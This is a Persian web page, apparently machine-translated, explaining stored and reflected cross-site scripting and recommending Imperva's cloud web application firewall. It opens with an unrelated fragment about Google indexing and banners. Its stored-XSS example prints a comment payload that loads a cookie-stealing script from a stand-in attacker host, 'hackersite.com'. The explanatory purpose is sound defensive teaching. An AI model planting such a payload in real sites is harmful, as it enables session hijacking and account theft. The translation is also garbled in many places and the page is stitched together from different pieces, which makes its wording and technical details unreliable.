‘زیرا اگر از بنر استفاده می کنید ، حتی اگر این کار در سیستم های Google ارائه شود ، دیگر نمی تواند ایندکس کردن بقیه مطالب شما را مسدود کند. در حالی که اگر بینابینی دارید که در بدترین حالت … کلیه مطالب قدیمی را حذف می کند و جایگزین آن با این … کشور یا زبان ساز می شود ، ممکن است ما آن فهرست را برای فهرست بندی در آن صفحه نگذاریم. ‘ بسیاری از سایت ها از یک نماد محجوب در گوشه بالا و سمت راست استفاده می کنند یا از IP sniffing برای هدایت کاربران به نسخه صحیح یک صفحه وب استفاده می کنند.

منبع 

Hoonarjo 2.jpgس 750x480 - حمله به اسکریپت نویسی سایت (XSS)

حمله به اسکریپت نویسی سایت (XSS)

اسکریپت نویسی سایت متقاطع (XSS) چیست؟

اسکریپت نویسی یا برنامه نویسی (Cross Site XSS) یک بردار حمله متداول است که کدهای مخرب را به یک برنامه وب آسیب پذیر تزریق می کند. XSS با سایر بردارهای حمله وب (مانند تزریق SQL) متفاوت است ، به این دلیل که مستقیماً برنامه مورد نظر خود را هدف قرار نمی دهد. درعوض ، کاربران برنامه وب کسانی هستند که در معرض خطر هستند.

یک حمله موفقیت آمیز در زمینه نگارش در سایت ، می تواند عواقب مخربی برای شهرت یک کسب و کار آنلاین و ارتباط آن با مشتریان خود داشته باشد.

بسته به شدت حمله ، ممکن است حسابهای کاربر به خطر بیفتد ، برنامه اسب Trojan فعال شود و محتوای صفحه تغییر یابد ، کاربران را گمراه می کند تا با اراده شخصی اطلاعات شخصی خود را تسلیم کنند. سرانجام ، کوکی های جلسه می توانند فاش شوند و به یک عامل متهم می شود تا کاربران معتبر را جعل کند و از حساب های خصوصی خود سوء استفاده کند.

بیشتربخوانید >>‌ سرور Origin چیست؟ 

حملات اسکریپت کراس سایت می تواند به دو نوع تقسیم شود: ذخیره شده و منعکس شده.

ذخیره شده XSS ، همچنین به عنوان XSS مداوم شناخته می شود ، آسیب بیشتری به این دو می زند. این اتفاق می افتد وقتی یک اسکریپت مخرب مستقیماً به یک برنامه وب آسیب پذیر تزریق می شود.

بازتاب XSS شامل بازتاب یک اسکریپت مخرب از یک برنامه وب ، بر روی مرورگر کاربر است. اسکریپت در یک پیوند تعبیه شده است و فقط پس از کلیک بر روی این لینک فعال می شود.

برنامه نویسی متقاطع ذخیره شده چیست؟ 

برنامه نویسی متقاطع ذخیره شده چیست؟ 

برای انجام موفقیت آمیز یک حمله ذخیره شده XSS ، یک مرتکب مجبور است یک آسیب پذیری را در یک برنامه وب پیدا کند و سپس اسکریپت های مخرب را به سرور خود تزریق کند (به عنوان مثال ، از طریق یک قسمت نظر).

یکی از هدفهای متداول وب سایتهایی هستند که به کاربران امکان اشتراک گذاری مطالب را از جمله وبلاگ ها ، شبکه های اجتماعی ، سیستم عامل های اشتراک گذاری ویدیو و تابلوهای پیام را می دهد. هر بار که صفحه آلوده مشاهده می شود ، اسکریپت مخرب به مرورگر قربانی منتقل می شود.

به عنوان مثال حمله ذخیره شده XSS

مرتکب هنگام مرور یک وب سایت تجارت الکترونیکی ، یک آسیب پذیری را کشف می کند که باعث می شود برچسب های HTML در بخش نظرات سایت تعبیه شوند. برچسب های تعبیه شده به یک ویژگی دائمی صفحه تبدیل می شوند و باعث می شوند مرورگر هر بار که صفحه باز می شود ، آنها را با بقیه منبع منبع تجزیه کند.

مهاجم نظر زیر را اضافه می کند: قیمت عالی برای کالای عالی! نقد و بررسی من را اینجا بخوانید src \u003d ‘http://hackersite.com/authstealer.js’ / اسکریپت.

از این نقطه به بعد ، هر بار که به این صفحه دسترسی پیدا کنید ، برچسب HTML موجود در نظر ، پرونده JavaScript را که در یک سایت دیگر میزبانی شده است ، فعال می کند و این قابلیت را دارد که کوکی های جلسه بازدید کنندگان را سرقت کند.

.jpg - حمله به اسکریپت نویسی سایت (XSS)

با استفاده از کوکی جلسه ، مهاجم می تواند حساب بازدید کننده را به خطر بیاندازد و به وی دسترسی آسان به اطلاعات شخصی و اطلاعات کارت اعتباری خود را بدهد. در همین حال ، بازدید کننده ، که ممکن است هرگز حتی به بخش نظرات پایین نوردد ، آگاهی ندارد که این حمله رخ داده است.

برخلاف حمله منعکس شده ، در جایی که فیلمنامه پس از کلیک روی یک لینک فعال می شود ، حمله ذخیره شده فقط نیاز دارد که قربانی از صفحه وب به خطر بیافتد. این میزان دسترسی را افزایش می دهد و همه بازدید کنندگان را بدون توجه به سطح هوشیاری آنها به خطر می اندازد.

از نظر مرتکب ، حملات مداوم XSS به دلیل مشکل در یافتن وب سایت قاچاق شده و آسیب پذیری هایی که امکان تعبیه اسکریپت دائمی را دارند ، انجام نسبتاً سخت تر است.

پیشگیری / کاهش حمله XSS ذخیره شده

.jpg - حمله به اسکریپت نویسی سایت (XSS)

فایروال برنامه وب (WAF) متداول ترین راه حل برای محافظت در برابر حملات XSS و برنامه های وب است.

WAF ها از روشهای مختلفی برای مقابله با بردارهای حمله استفاده می کنند. در مورد XSS ، بیشتر برای شناسایی و مسدود کردن درخواست های مخرب به فیلترهای مبتنی بر امضا متکی هستند.

مطابق با بهترین شیوه های صنعت ، فایروال برنامه وب ابری Imperva از فیلتر امضا نیز برای مقابله با حملات اسکریپت کراس سایت استفاده می کند.

Imperva cloud WAF به عنوان یک سرویس مدیریت شده ارائه می شود ، که به طور مرتب توسط تیمی از کارشناسان امنیتی که دائماً قانون امنیتی را با امضاهای بردارهای حمله تازه کشف شده به روز می کنند ، ارائه می شود.

فن آوری کلاچینگ Imperva بطور خودکار داده ها را از طریق شبکه خود جمع می کند و به سود کلیه مشتریان حمله می کند.

رویکرد شلوغی ، پاسخ سریع را به تهدیدات روز صفر می دهد ، و به محض شناسایی یک حمله تک ، تمام جامعه کاربران را در برابر هرگونه تهدید جدید محافظت می کند.

Crowdsourcing همچنین استفاده از سیستم شهرت IP را امکان پذیر می کند که متخلفین مکرر ، از جمله منابع بات نت را که مجدداً توسط مجرمین متعدد مورد استفاده مجدد قرار می گیرند ، مسدود می کند.

منبع